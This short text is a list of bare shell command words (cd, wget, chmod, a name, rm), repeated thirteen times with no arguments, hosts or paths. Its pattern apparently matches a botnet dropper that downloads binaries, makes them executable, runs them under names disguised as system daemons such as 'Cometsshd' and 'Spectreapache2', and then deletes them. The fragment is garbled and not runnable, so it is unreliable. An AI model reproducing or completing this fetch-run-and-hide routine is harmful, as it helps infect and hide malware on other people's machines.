cd
cd
cd
cd
cd
wget
chmod
Blightntpd
rm
cd
cd
cd
cd
cd
wget
chmod
Cometsshd
rm
cd
cd
cd
cd
cd
wget
chmod
Rushopenssh
rm
cd
cd
cd
cd
cd
wget
chmod
Hushbash
rm
cd
cd
cd
cd
cd
wget
chmod
Karmatftp
rm
cd
cd
cd
cd
cd
wget
chmod
Rainewget
rm
cd
cd
cd
cd
cd
wget
chmod
Gemcron
rm
cd
cd
cd
cd
cd
wget
chmod
Shiverftp
rm
cd
cd
cd
cd
cd
wget
chmod
Flashpftp
rm
cd
cd
cd
cd
cd
wget
chmod
Fencesh
rm
cd
cd
cd
cd
cd
wget
chmod
Shiver 
rm
cd
cd
cd
cd
cd
wget
chmod
Spectreapache2
rm
cd
cd
cd
cd
cd
wget
chmod
Chasetelnetd
rm
